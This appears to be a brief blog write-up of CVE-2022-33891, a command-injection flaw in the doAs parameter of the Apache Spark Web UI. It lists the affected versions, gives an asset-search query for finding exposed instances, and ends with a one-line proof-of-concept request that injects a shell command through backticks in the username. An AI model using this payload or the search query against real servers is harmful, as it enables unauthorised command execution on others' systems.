Apache Spark Doas Remote Command Execution Vulnerability Cve 2022 33891
Apache Spark Doas Remote Command Execution Vulnerability Cve 2022 33891
Apache Spark doAs remote command execution vulnerability CVE-2022-33891
Vulnerability Description
Apache Spark supports starting ACLs to provide authentication for Web UI access, and when ACLs start, you can create RCEs by constructing a special request username.
Vulnerability Impact
Spark Core - Apache <=3.0.3
3.1.1 <= Spark Core - Apache <=3.1.2
3.2.0 <= Spark Core - Apache <=3.2.1
Network surveying and mapping
app=”APACHE-Spark”
Vulnerability reappears
Main page
Verify POC
1
/jobs/?doAs=`touch /tmp/test.txt`
This post is licensed under CC BY 4.0 by the author.